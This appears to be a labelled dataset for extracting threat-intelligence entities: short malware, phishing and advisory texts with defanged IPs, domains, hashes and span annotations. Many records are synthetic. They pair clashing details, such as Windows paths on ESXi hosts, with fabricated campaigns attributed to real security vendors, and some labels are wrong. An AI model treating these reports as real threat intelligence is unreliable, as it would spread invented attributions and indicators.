{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Mimikatz artifacts at /var/tmp/agent.py. Memory dump analysis confirmed execution of Covenant. Registry modifications pointed to persistence via /usr/local/bin/chrome_helper.exe. Network forensics identified connections to 220[.]160[.]183[.]128 and sync-gateway[.]xyz. Email headers traced the initial vector to contact@secure-verify[.]net. File /dev/shm/taskhost.exe (MD5: 0be6383fdc3e9ae48b1d8a47606bc5a6) was identified as the initial dropper. A staging URL hxxps://loginapi[.]top/assets/js/payload.js resolved to 172 [ . ] 221 [ . ] 118 [ . ] 45. Secondary artifact hash: SHA1: d37d89f867324261d0e44634f39529788fd32387.", "spans": {"Indicator: 220.160.183.128": [[295, 316]], "Indicator: sync-gateway.xyz": [[321, 339]], "Indicator: contact@secure-verify.net": [[384, 411]], "Indicator: 0be6383fdc3e9ae48b1d8a47606bc5a6": [[446, 478]], "Indicator: https://loginapi.top/assets/js/payload.js": [[533, 576]], "Indicator: 172.221.118.45": [[589, 621]], "Indicator: d37d89f867324261d0e44634f39529788fd32387": [[654, 694]]}, "info": {"id": "synth_v2_01216", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: BlackCat (SHA1: 4badc3fe5d500a0ee06b28a7b79ac9522412317b). Upon execution on VMware ESXi, the sample creates C:\\Windows\\System32\\ntds.dit and injects into legitimate processes. Network analysis shows beaconing to 63[.]72[.]8[.]231 every 60 seconds and DNS queries to relay-sync[.]online. The second stage was fetched from hxxp://relayrelay[.]tech/gate.php and written to C:\\Users\\admin\\AppData\\Local\\Temp\\helper.sh. The payload uses CrackMapExec-style techniques for defense evasion. A secondary hash (MD5: da078f267320b633160e8c1632de0e61) was extracted from the unpacked payload.", "spans": {"Malware: BlackCat": [[25, 33]], "Indicator: 4badc3fe5d500a0ee06b28a7b79ac9522412317b": [[41, 81]], "System: VMware ESXi": [[102, 113]], "Indicator: 63.72.8.231": [[238, 255]], "Indicator: relay-sync.online": [[292, 311]], "Indicator: hxxp://relayrelay.tech/gate.php": [[347, 380]], "Indicator: da078f267320b633160e8c1632de0e61": [[532, 564]]}, "info": {"id": "synth_v2_00602", "source": "defanged_augment"}}
{"text": "IOC Bulletin - BumbleBee Campaign:\nNetwork Indicators:\n- 172 [ . ] 243 [ . ] 112 [ . ] 126\n- 91[.]175[.]131[.]113\n- 17[.]224[.]65[.]114\n- proxydata[.]tech\n- backupedge[ . ]dev\nURLs:\n- hxxp://authsecure[.]dev/callback\n- hxxp://authstorage[.]dev/collect\nEmail Senders:\n- billing@document-share[ . ]link\n- noreply@document-share[ . ]link\nFile Indicators:\n- SHA256: 67778e4a7cc0aa37fc999dcd453d3acc97e4263a659a45f4536a2dc088581cb5\n- MD5: 0957fcf13fb365823854fec6542ee5b4\n- Drop path: /usr/local/bin/config.dat", "spans": {"Malware: BumbleBee": [[15, 24]], "Indicator: 172.243.112.126": [[57, 90]], "Indicator: 91.175.131.113": [[93, 113]], "Indicator: 17.224.65.114": [[116, 135]], "Indicator: proxydata.tech": [[138, 154]], "Indicator: backupedge.dev": [[157, 175]], "Indicator: http://authsecure.dev/callback": [[184, 216]], "Indicator: hxxp://authstorage.dev/collect": [[219, 251]], "Indicator: billing@document-share.link": [[269, 300]], "Indicator: noreply@document-share.link": [[303, 334]], "Indicator: 67778e4a7cc0aa37fc999dcd453d3acc97e4263a659a45f4536a2dc088581cb5": [[362, 426]], "Indicator: 0957fcf13fb365823854fec6542ee5b4": [[434, 466]]}, "info": {"id": "synth_v2_01425", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: WarmCookie (SHA1: b8be3f9d1120996537073d8c2087373051aeabb3). Upon execution on Active Directory, the sample creates /var/tmp/beacon.dll and injects into legitimate processes. Network analysis shows beaconing to 200 [ . ] 59 [ . ] 120 [ . ] 237 every 60 seconds and DNS queries to edgestorage[.]org. The second stage was fetched from hxxps://update-gateway[ . ]net/admin/config and written to C:\\Windows\\Temp\\taskhost.exe. The payload uses CrackMapExec-style techniques for defense evasion. A secondary hash (SHA1: 8b171cfa4962ff8f7bb0261df6fe81ad2c86117b) was extracted from the unpacked payload.", "spans": {"Malware: WarmCookie": [[25, 35]], "Indicator: b8be3f9d1120996537073d8c2087373051aeabb3": [[43, 83]], "System: Active Directory": [[104, 120]], "Indicator: 200.59.120.237": [[236, 268]], "Indicator: edgestorage.org": [[305, 322]], "Indicator: https://update-gateway.net/admin/config": [[358, 401]], "Indicator: 8b171cfa4962ff8f7bb0261df6fe81ad2c86117b": [[539, 579]]}, "info": {"id": "synth_v2_00620", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: RemcosRAT (SHA256: 38ad20887d2715778f071a6cc5a0528469f6a883e242d9f68a10a32c3858d660). Upon execution on F5 BIG-IP, the sample creates /opt/app/bin/winlogon.exe and injects into legitimate processes. Network analysis shows beaconing to 124[.]176[.]96[.]161 every 60 seconds and DNS queries to relaycloud[ . ]online. The second stage was fetched from hxxps://edgerelay[ . ]net/admin/config and written to C:\\Users\\admin\\Downloads\\backdoor.elf. The payload uses Hashcat-style techniques for defense evasion. A secondary hash (SHA1: dd008052b4ed983e7fd1aa5891fd930232661f7a) was extracted from the unpacked payload.", "spans": {"Malware: RemcosRAT": [[25, 34]], "Indicator: 38ad20887d2715778f071a6cc5a0528469f6a883e242d9f68a10a32c3858d660": [[44, 108]], "System: F5 BIG-IP": [[129, 138]], "Indicator: 124.176.96.161": [[260, 280]], "Indicator: relaycloud.online": [[317, 338]], "Indicator: https://edgerelay.net/admin/config": [[374, 412]], "Indicator: dd008052b4ed983e7fd1aa5891fd930232661f7a": [[554, 594]]}, "info": {"id": "synth_v2_00501", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Riskware.Confuser! Trojan.Win32.SteamBurglar.dmdrlr Trojan.SteamBurglar.621 Trojan.Katusha.Win32.39398 BehavesLike[ . ]Win32[ . ]Backdoor[ . ]cc TR/Confuser.181248 MSIL/Injector.LTM!tr PWS:MSIL/Stimilini.C Trj/CI.A Trojan.MSIL.Stimilik MSIL6.AKRX Trojan.MSIL.Stimilik.DT", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Backdoor.cc": [[129, 170]]}, "info": {"id": "cyner2_train_005764", "source": "defanged_augment"}}
{"text": "The Play ransomware group has targeted organizations using CVE-2022-41040 and CVE-2022-41082 in Microsoft Exchange Server, collectively known as ProxyNotShell. After exploitation, the actors deployed a webshell at C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx. The ransomware encrypted files with the .play extension. FBI investigation uncovered command and control infrastructure at 45[.]76[.]172[.]198 and 64 [ . ] 190 [ . ] 113 [ . ] 52. Encrypted DNS over HTTPS was used to evade detection.", "spans": {"Malware: Play": [[4, 8]], "Vulnerability: CVE-2022-41040": [[59, 73]], "Vulnerability: CVE-2022-41082": [[78, 92]], "System: Microsoft Exchange Server": [[96, 121]], "Organization: FBI": [[319, 322]], "Indicator: 45.76.172.198": [[385, 404]], "Indicator: 64.190.113.52": [[409, 440]]}, "info": {"id": "cisa_00029", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2022-32541 is a critical null pointer dereference affecting Palo Alto PAN-OS. Google TAG confirmed active exploitation by Turla in the wild. Exploitation delivers Emotet (SHA1: 6ffd0536fe3267b8116f4f2fb2cc647326325d14) which is dropped to C:\\Windows\\Temp\\chrome_helper.exe. The exploit payload is hosted at hxxp://cdn-auth[.]com/wp-content/uploads/doc.php and communicates to 192 [ . ] 108 [ . ] 85 [ . ] 38 for C2.", "spans": {"Vulnerability: CVE-2022-32541": [[24, 38]], "Vulnerability: null pointer dereference": [[53, 77]], "System: Palo Alto PAN-OS": [[88, 104]], "Organization: Google TAG": [[106, 116]], "Malware: Emotet": [[191, 197]], "Indicator: 6ffd0536fe3267b8116f4f2fb2cc647326325d14": [[205, 245]], "Indicator: hxxp://cdn-auth.com/wp-content/uploads/doc.php": [[335, 383]], "Indicator: 192.108.85.38": [[404, 435]]}, "info": {"id": "synth_v2_00769", "source": "defanged_augment"}}
{"text": "Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza[ . ]r23 :", "spans": {"Indicator: Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.r23": [[0, 60]]}, "info": {"id": "cyberner_stix_train_007331", "source": "defanged_augment"}}
{"text": "The Bumblebee loader contacts three staging URLs: hxxps://loader-bin[[.]]work/download/payload.exe, hxxp://share-files[[.]]biz/gate.php, and hxxps://token-auth[[ . ]]space/api/beacon. The final payload (SHA256: 0dca123ba69c7c94a793d25435d3a271d9c66b68f6a5b90b3454a57293902f5d) is downloaded and executed. Fallback C2 is at 159 [ . ] 65 [ . ] 60 [ . ] 31.", "spans": {"Malware: Bumblebee": [[4, 13]], "Indicator: hxxps://loader-bin[.]work/download/payload.exe": [[50, 98]], "Indicator: hxxp://share-files[.]biz/gate.php": [[100, 135]], "Indicator: hxxps://token-auth[.]space/api/beacon": [[141, 182]], "Indicator: 0dca123ba69c7c94a793d25435d3a271d9c66b68f6a5b90b3454a57293902f5d": [[211, 275]], "Indicator: 159.65.60.31": [[323, 353]]}, "info": {"id": "synth_00099", "source": "defanged_augment"}}
{"text": "At the time of writing this research , four versions of the EventBot malware were observed : Version 0 [ . ] 0 [ . ] 0 [ . ] 1 , 0[.]0[.]0[.]2 , and 0[.]3[.]0[.]1 and 0[.]4[.]0[.]1 . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others . In December 2015 , Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload .", "spans": {"Malware: EventBot": [[60, 68]], "Malware: sample": [[199, 205]], "Organization: Unit 42": [[344, 351]], "Malware: Emissary Trojan": [[410, 425]], "Indicator: 0.0.0.1": [[101, 126]], "Indicator: 0.0.0.2": [[129, 142]], "Indicator: 0.3.0.1": [[149, 162]], "Indicator: 0.4.0.1": [[167, 180]]}, "info": {"id": "cyberner_stix_train_000444", "source": "defanged_augment"}}
{"text": "In Version 0[.]0[.]0[.]1 , the communication with the C2 is encrypted using Base64 and RC4 . Development of Bemstour has continued into 2019 . One payload was a Python based open source remote administration tool ( RAT ) called Pupy .", "spans": {"Malware: Bemstour": [[108, 116]], "Malware: remote administration tool": [[186, 212]], "Malware: RAT": [[215, 218]], "Malware: Pupy": [[228, 232]], "Indicator: 0.0.0.1": [[11, 24]]}, "info": {"id": "cyberner_stix_train_006321", "source": "defanged_augment"}}
{"text": "Tenable detected a multi-stage attack chain. The initial phishing email from ceo@phishing-domain[.]com contained a link to hxxp://backupapi[ . ]net/secure/token. This redirected to hxxps://relay-gateway[.]link/collect on cdn-relay[ . ]net. A secondary email from it@account-update[ . ]xyz pointed to hxxp://relaysecure[ . ]club/assets/js/payload.js which delivered Amadey. The final payload callback was hxxp://cloudcloud[.]cc/panel/index.html resolving to 10[.]48[.]33[.]37 via static-backup[ . ]online.", "spans": {"Organization: Tenable": [[0, 7]], "Indicator: ceo@phishing-domain.com": [[77, 102]], "Indicator: hxxp://backupapi.net/secure/token": [[123, 160]], "Indicator: https://relay-gateway.link/collect": [[181, 217]], "Indicator: cdn-relay.net": [[221, 238]], "Indicator: it@account-update.xyz": [[263, 288]], "Indicator: http://relaysecure.club/assets/js/payload.js": [[300, 348]], "Malware: Amadey": [[365, 371]], "Indicator: http://cloudcloud.cc/panel/index.html": [[404, 443]], "Indicator: 10.48.33.37": [[457, 474]], "Indicator: static-backup.online": [[479, 503]]}, "info": {"id": "synth_v2_01831", "source": "defanged_augment"}}
{"text": "IOC Bulletin - FormBook Campaign:\nNetwork Indicators:\n- 192 [ . ] 100 [ . ] 201 [ . ] 206\n- 36 [ . ] 220 [ . ] 185 [ . ] 215\n- 172 [ . ] 234 [ . ] 97 [ . ] 112\n- cachestatic[ . ]dev\n- api-update[ . ]org\nURLs:\n- hxxps://static-cdn[ . ]top/assets/js/payload.js\n- hxxp://update-cloud[.]io/download/update.exe\nEmail Senders:\n- alert@account-update[ . ]xyz\n- alert@auth-check[ . ]org\nFile Indicators:\n- SHA1: 23dc382b600a69f4ef7bcb10b99a5ac3b6e8a490\n- MD5: c3318098c6d5d76e6febb40abef2dc59\n- Drop path: C:\\ProgramData\\shell.php", "spans": {"Malware: FormBook": [[15, 23]], "Indicator: 192.100.201.206": [[56, 89]], "Indicator: 36.220.185.215": [[92, 124]], "Indicator: 172.234.97.112": [[127, 159]], "Indicator: cachestatic.dev": [[162, 181]], "Indicator: api-update.org": [[184, 202]], "Indicator: https://static-cdn.top/assets/js/payload.js": [[211, 258]], "Indicator: http://update-cloud.io/download/update.exe": [[261, 305]], "Indicator: alert@account-update.xyz": [[323, 351]], "Indicator: alert@auth-check.org": [[354, 378]], "Indicator: 23dc382b600a69f4ef7bcb10b99a5ac3b6e8a490": [[404, 444]], "Indicator: c3318098c6d5d76e6febb40abef2dc59": [[452, 484]]}, "info": {"id": "synth_v2_01422", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Cisco Talos identified a large-scale phishing operation. Emails originated from support@auth-check[.]org and info@identity-verify[ . ]cc, spoofing legitimate services. Victims were directed to hxxps://mailsync[ . ]tech/download/update.exe which hosted a credential harvesting page on backupupdate[ . ]org. A secondary link hxxps://sync-backup[ . ]info/panel/index.html delivered Hive (SHA1: 6be675b404f934eb4372c1c4b5c503471d73e6e8). The malware was saved to C:\\Program Files\\Common Files\\dropper.ps1 and established C2 with 5 [ . ] 119 [ . ] 162 [ . ] 211.", "spans": {"Organization: Cisco Talos": [[26, 37]], "Indicator: support@auth-check.org": [[106, 130]], "Indicator: info@identity-verify.cc": [[135, 162]], "Indicator: hxxps://mailsync.tech/download/update.exe": [[219, 264]], "Indicator: backupupdate.org": [[310, 330]], "Indicator: hxxps://sync-backup.info/panel/index.html": [[349, 394]], "Malware: Hive": [[405, 409]], "Indicator: 6be675b404f934eb4372c1c4b5c503471d73e6e8": [[417, 457]], "Indicator: 5.119.162.211": [[551, 582]]}, "info": {"id": "synth_v2_01012", "source": "defanged_augment"}}
{"text": "**Dump Domain Registration Patterns:*From about 2015 to at least October 2018 possibly longer, IBM X-Force assesses that ITG08's POS malware used the same notable domain naming convention: all known dump domains used by FrameworkPOS and GratefulPOS contained the same base name -akamaitechnologies[ . ]com. In fact, all said domains are nearly identical looking to a legitimate Akamai content delivery network CDN domain, differing only by a single character replacing a .' with - .", "spans": {"Organization: **Dump Domain Registration Patterns:*From": [[0, 41]], "Organization: IBM X-Force": [[95, 106]], "Malware: ITG08's POS malware": [[121, 140]], "Malware: FrameworkPOS": [[220, 232]], "Malware: GratefulPOS": [[237, 248]], "System: content delivery network CDN": [[385, 413]], "Indicator: akamaitechnologies.com": [[279, 305]]}, "info": {"id": "cyner2_train_004081", "source": "defanged_augment"}}
{"text": "We were able to collect a second delivery document that shared the Joohn author from the crash list ( Lion Air Boeing 737 )[.]docx document , as well as the 188[.]241[.]58[.]170 C2 IP to host its remote template .", "spans": {"Indicator: crash list ( Lion Air Boeing 737 ).docx": [[89, 130]], "Indicator: 188.241.58.170": [[157, 177]]}, "info": {"id": "cyberner_stix_train_007555", "source": "defanged_augment"}}
{"text": "FireEye published a threat intelligence report linking Storm-0558 to a new campaign exploiting CVE-2023-28217 in Windows Server 2019. The attackers deployed DarkSide via PowerShell Empire, establishing C2 communication with 172[.]252[.]34[.]154 and proxyauth[ . ]tech. A secondary payload was downloaded from hxxps://sync-secure[.]cc/download/update.exe. The malware binary (MD5: 95974a7bf27e08ea33589fdb737c315f) was dropped to C:\\Windows\\Tasks\\payload.bin. Phishing emails were sent from it@account-update[.]xyz targeting enterprise users. A backup C2 server was identified at 149[.]246[.]223[.]223.", "spans": {"Organization: FireEye": [[0, 7]], "Vulnerability: CVE-2023-28217": [[95, 109]], "System: Windows Server 2019": [[113, 132]], "Malware: DarkSide": [[157, 165]], "Indicator: 172.252.34.154": [[224, 244]], "Indicator: proxyauth.tech": [[249, 267]], "Indicator: hxxps://sync-secure.cc/download/update.exe": [[309, 353]], "Indicator: 95974a7bf27e08ea33589fdb737c315f": [[380, 412]], "Indicator: it@account-update.xyz": [[490, 513]], "Indicator: 149.246.223.223": [[579, 600]]}, "info": {"id": "synth_v2_00241", "source": "defanged_augment"}}
{"text": "IOC Bulletin - WarmCookie Campaign:\nNetwork Indicators:\n- 10 [ . ] 10 [ . ] 87 [ . ] 218\n- 140 [ . ] 224 [ . ] 90 [ . ] 134\n- 102[.]239[.]109[.]101\n- api-portal[.]xyz\n- update-edge[ . ]info\nURLs:\n- hxxp://proxy-secure[.]club/download/update.exe\n- hxxp://data-cloud[.]club/portal/verify\nEmail Senders:\n- report@phishing-domain[.]com\n- account@mail-service[ . ]info\nFile Indicators:\n- MD5: 156af39be9b520c4c110258bbfab84c6\n- SHA256: 6f2935cf8ab114370f34a59ea6a628c5afe4e5234d9627f368b5792b1bf83fa8\n- Drop path: /dev/shm/agent.py", "spans": {"Malware: WarmCookie": [[15, 25]], "Indicator: 10.10.87.218": [[58, 88]], "Indicator: 140.224.90.134": [[91, 123]], "Indicator: 102.239.109.101": [[126, 147]], "Indicator: api-portal.xyz": [[150, 166]], "Indicator: update-edge.info": [[169, 189]], "Indicator: http://proxy-secure.club/download/update.exe": [[198, 244]], "Indicator: http://data-cloud.club/portal/verify": [[247, 285]], "Indicator: report@phishing-domain.com": [[303, 331]], "Indicator: account@mail-service.info": [[334, 363]], "Indicator: 156af39be9b520c4c110258bbfab84c6": [[388, 420]], "Indicator: 6f2935cf8ab114370f34a59ea6a628c5afe4e5234d9627f368b5792b1bf83fa8": [[431, 495]]}, "info": {"id": "synth_v2_01483", "source": "defanged_augment"}}
{"text": "Blog Post by Cisco Talos: Tracking Lazarus Group's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-24110 against Windows Server 2019 deployments. The initial access vector involves spear-phishing emails from service@phishing-domain[ . ]com delivering WarmCookie. Post-compromise, the attackers deploy XLoader and use Brute Ratel for reconnaissance. C2 infrastructure includes 91[.]53[.]140[.]72 and gatewaygateway[.]dev. A staging server at hxxp://static-gateway[ . ]link/assets/js/payload.js hosts additional tooling. Key artifact: C:\\ProgramData\\winlogon.exe (MD5: b47838070e7f78158b7f031cc072dcdf).", "spans": {"Organization: Cisco Talos": [[13, 24]], "Vulnerability: CVE-2021-24110": [[128, 142]], "System: Windows Server 2019": [[151, 170]], "Indicator: service@phishing-domain.com": [[246, 277]], "Malware: WarmCookie": [[289, 299]], "Malware: XLoader": [[339, 346]], "Indicator: 91.53.140.72": [[414, 432]], "Indicator: gatewaygateway.dev": [[437, 457]], "Indicator: http://static-gateway.link/assets/js/payload.js": [[479, 530]], "Indicator: b47838070e7f78158b7f031cc072dcdf": [[605, 637]]}, "info": {"id": "synth_v2_01688", "source": "defanged_augment"}}
{"text": "The “ core ” module contacts the C & C server , trying to get a fresh list of applications to search for , or if that fails , use a default app list : whatsapp lenovo.anyshare.gps mxtech.videoplayer.ad jio[.]jioplay[.]tv jio.media.jiobeats jiochat.jiochatapp jio.join good.gamecollection opera.mini.native startv.hotstar meitu.beautyplusme domobile.applock touchtype.swiftkey flipkart.android cn.xender It is worth noting that attackers used the same compromised websites to spread Buhtrap as those that had been used for the Corkow Trojan . In later stages , Dexphot targets a few other system processes for process hollowing : svchost[ . ]exe , tracert[.]exe , and setup[.]exe . Enterprise T1078 Valid Accounts APT29 has used a compromised account to access an organization 's VPN infrastructure .", "spans": {"System: whatsapp": [[151, 159]], "Malware: Dexphot": [[560, 567]], "Indicator: svchost.exe": [[629, 644]], "Indicator: tracert.exe": [[647, 660]], "Indicator: setup.exe": [[667, 678]], "System: organization 's VPN infrastructure": [[763, 797]], "Indicator: jio.jioplay.tv": [[202, 220]]}, "info": {"id": "cyberner_stix_train_004832", "source": "defanged_augment"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementation for `tf.raw_ops.BoostedTreesCreateEnsemble` can result in a use after free error if an attacker supplies specially crafted arguments. The [implementation](hxxps://github[ . ]com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/boosted_trees/resource_ops.cc#L55) uses a reference counted resource and decrements the refcount if the initialization fails, as it should. However, when the code was written, the resource was represented as a naked pointer but later refactoring has changed it to be a smart pointer. Thus, when the pointer leaves the scope, a subsequent `free`-ing of the resource occurs, but this fails to take into account that the refcount has already reached 0, thus the resource has been already freed. During this double-free process, members of the resource object are accessed for cleanup but they are invalid as the entire resource has been freed. We have patched the issue in GitHub commit 5ecec9c6fbdbc6be03295685190a45e7eee726ab. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/boosted_trees/resource_ops.cc#L55": [[266, 414]], "Indicator: 5ecec9c6fbdbc6be03295685190a45e7eee726ab": [[1065, 1105]], "Organization: GitHub": [[1051, 1057]], "Vulnerability: use after free": [[171, 185]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-37652"}}
{"text": "Fail2ban honeypot data from 2026-04-23 revealed 63 IP addresses conducting SSH brute-force attacks. Several IPs also probed for CVE-2024-6387, a critical OpenSSH vulnerability known as regreSSHion. Top attacking IPs included 218 [ . ] 92 [ . ] 0 [ . ] 107, 61 [ . ] 177 [ . ] 173 [ . ] 16, and 112[.]85[.]42[.]88. These IPs are associated with known botnet infrastructure originating from Chinese autonomous systems.", "spans": {"Vulnerability: CVE-2024-6387": [[128, 141]], "Indicator: 218.92.0.107": [[225, 255]], "Indicator: 61.177.173.16": [[257, 288]], "Indicator: 112.85.42.88": [[294, 312]], "Vulnerability: regreSSHion": [[185, 196]], "System: OpenSSH": [[154, 161]]}, "info": {"id": "otx_00032", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Royal campaign:\nStage 1 dropper at /tmp/payload.bin - SHA256: b0cfa2721a8b6a7309101bd87646148d837b4d6d6a8de32a78889ded4d9841f1\nStage 2 loader at /var/tmp/agent.py - SHA1: 646c44f1b445e2676eb8121bee8b1240c81ddcf1\nFinal payload at /opt/app/bin/helper.sh - SHA1: c54686ffee846c752987e1eb34720ae0ab396eff\nExfiltration module - SHA256: f7326c08024d3709fd6f6f0bc959382c9ba86fea13d7e4e87b3f634a17e71d31\nAll stages communicated with 107[.]82[.]67[.]199. Chisel signatures detected in Stage 2.", "spans": {"Malware: Royal": [[22, 27]], "Indicator: b0cfa2721a8b6a7309101bd87646148d837b4d6d6a8de32a78889ded4d9841f1": [[84, 148]], "Indicator: 646c44f1b445e2676eb8121bee8b1240c81ddcf1": [[193, 233]], "Indicator: c54686ffee846c752987e1eb34720ae0ab396eff": [[282, 322]], "Indicator: f7326c08024d3709fd6f6f0bc959382c9ba86fea13d7e4e87b3f634a17e71d31": [[353, 417]], "Indicator: 107.82.67.199": [[447, 466]]}, "info": {"id": "synth_v2_01980", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix race when deleting quota root from the dirty cow roots list\n\nWhen disabling quotas we are deleting the quota root from the list\nfs_info->dirty_cowonly_roots without taking the lock that protects it,\nwhich is struct btrfs_fs_info::trans_lock. This unsynchronized list\nmanipulation may cause chaos if there's another concurrent manipulation\nof this list, such as when adding a root to it with\nctree.c:add_root_to_dirty_list().\n\nThis can result in all sorts of weird failures caused by a race, such as\nthe following crash:\n\n  [337571.278245] general protection fault, probably for non-canonical address 0xdead000000000108: 0000 [#1] PREEMPT SMP PTI\n  [337571.278933] CPU: 1 PID: 115447 Comm: btrfs Tainted: G        W          6.4.0-rc6-btrfs-next-134+ #1\n  [337571.279153] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1[ . ]14[ . ]0-0-g155821a1990b-prebuilt[ . ]qemu[ . ]org 04/01/2014\n  [337571.279572] RIP: 0010:commit_cowonly_roots+0x11f/0x250 [btrfs]\n  [337571.279928] Code: 85 38 06 00 (...)\n  [337571.280363] RSP: 0018:ffff9f63446efba0 EFLAGS: 00010206\n  [337571.280582] RAX: ffff942d98ec2638 RBX: ffff9430b82b4c30 RCX: 0000000449e1c000\n  [337571.280798] RDX: dead000000000100 RSI: ffff9430021e4900 RDI: 0000000000036070\n  [337571.281015] RBP: ffff942d98ec2000 R08: ffff942d98ec2000 R09: 000000000000015b\n  [337571.281254] R10: 0000000000000009 R11: 0000000000000001 R12: ffff942fe8fbf600\n  [337571.281476] R13: ffff942dabe23040 R14: ffff942dabe20800 R15: ffff942d92cf3b48\n  [337571.281723] FS:  00007f478adb7340(0000) GS:ffff94349fa40000(0000) knlGS:0000000000000000\n  [337571.281950] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n  [337571.282184] CR2: 00007f478ab9a3d5 CR3: 000000001e02c001 CR4: 0000000000370ee0\n  [337571.282416] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n  [337571.282647] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n  [337571.282874] Call Trace:\n  [337571.283101]  <TASK>\n  [337571.283327]  ? __die_body+0x1b/0x60\n  [337571.283570]  ? die_addr+0x39/0x60\n  [337571.283796]  ? exc_general_protection+0x22e/0x430\n  [337571.284022]  ? asm_exc_general_protection+0x22/0x30\n  [337571.284251]  ? commit_cowonly_roots+0x11f/0x250 [btrfs]\n  [337571.284531]  btrfs_commit_transaction+0x42e/0xf90 [btrfs]\n  [337571.284803]  ? _raw_spin_unlock+0x15/0x30\n  [337571.285031]  ? release_extent_buffer+0x103/0x130 [btrfs]\n  [337571.285305]  reset_balance_state+0x152/0x1b0 [btrfs]\n  [337571.285578]  btrfs_balance+0xa50/0x11e0 [btrfs]\n  [337571.285864]  ? __kmem_cache_alloc_node+0x14a/0x410\n  [337571.286086]  btrfs_ioctl+0x249a/0x3320 [btrfs]\n  [337571.286358]  ? mod_objcg_state+0xd2/0x360\n  [337571.286577]  ? refill_obj_stock+0xb0/0x160\n  [337571.286798]  ? seq_release+0x25/0x30\n  [337571.287016]  ? __rseq_handle_notify_resume+0x3ba/0x4b0\n  [337571.287235]  ? percpu_counter_add_batch+0x2e/0xa0\n  [337571.287455]  ? __x64_sys_ioctl+0x88/0xc0\n  [337571.287675]  __x64_sys_ioctl+0x88/0xc0\n  [337571.287901]  do_syscall_64+0x38/0x90\n  [337571.288126]  entry_SYSCALL_64_after_hwframe+0x72/0xdc\n  [337571.288352] RIP: 0033:0x7f478aaffe9b\n\nSo fix this by locking struct btrfs_fs_info::trans_lock before deleting\nthe quota root from that list.", "spans": {"Indicator: rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org": [[911, 971]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[866, 870]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-54032"}}
{"text": "A backdoor also known as: W32/Autorun.Worm.aaeh Win32.Trojan.WisdomEyes.16070401.9500.9867 TSPY_TEPFER.GB Trojan.Win32.VBTrojan.bvufrt TrojWare[ . ]Win32[ . ]VB[ . ]HR Trojan.DownLoader10.21377 TSPY_TEPFER.GB BehavesLike[.]Win32[.]Swisyn[.]cc Trojan:Win32/Beelog.C Trojan.Win32.Jorik.28672.A Trojan/Win32.Jorik.R44838 Trj/CI.A Win32/Trojan.Downloader.f2c", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: TrojWare.Win32.VB.HR": [[135, 167]], "Indicator: BehavesLike.Win32.Swisyn.cc": [[209, 242]]}, "info": {"id": "cyner2_train_004453", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Emotet (SHA256: 052dcb920be5a1866a31792ad66276ac21edde89b39c16608902259658f7d822). Upon execution on MOVEit Transfer, the sample creates /var/tmp/implant.so and injects into legitimate processes. Network analysis shows beaconing to 192[.]59[.]148[.]2 every 60 seconds and DNS queries to storage-secure[ . ]site. The second stage was fetched from hxxp://mail-portal[.]com/download/update.exe and written to /usr/local/bin/ntds.dit. The payload uses PowerView-style techniques for defense evasion. A secondary hash (MD5: 5c47bfb1f42b0df00fa93e5f9760b569) was extracted from the unpacked payload.", "spans": {"Malware: Emotet": [[25, 31]], "Indicator: 052dcb920be5a1866a31792ad66276ac21edde89b39c16608902259658f7d822": [[41, 105]], "System: MOVEit Transfer": [[126, 141]], "Indicator: 192.59.148.2": [[257, 275]], "Indicator: storage-secure.site": [[312, 335]], "Indicator: hxxp://mail-portal.com/download/update.exe": [[371, 415]], "Indicator: 5c47bfb1f42b0df00fa93e5f9760b569": [[544, 576]]}, "info": {"id": "synth_v2_00528", "source": "defanged_augment"}}
{"text": "Some example file names using this technique include : AntiVirus_update_package[.]7z , acquisition[.]7z , offer[.]7z , update_flashplayer10ax[.]7z .", "spans": {"Indicator: AntiVirus_update_package.7z": [[55, 84]], "Indicator: acquisition.7z": [[87, 103]], "Indicator: offer.7z": [[106, 116]], "Indicator: update_flashplayer10ax.7z": [[119, 146]]}, "info": {"id": "cyberner_stix_train_004581", "source": "defanged_augment"}}
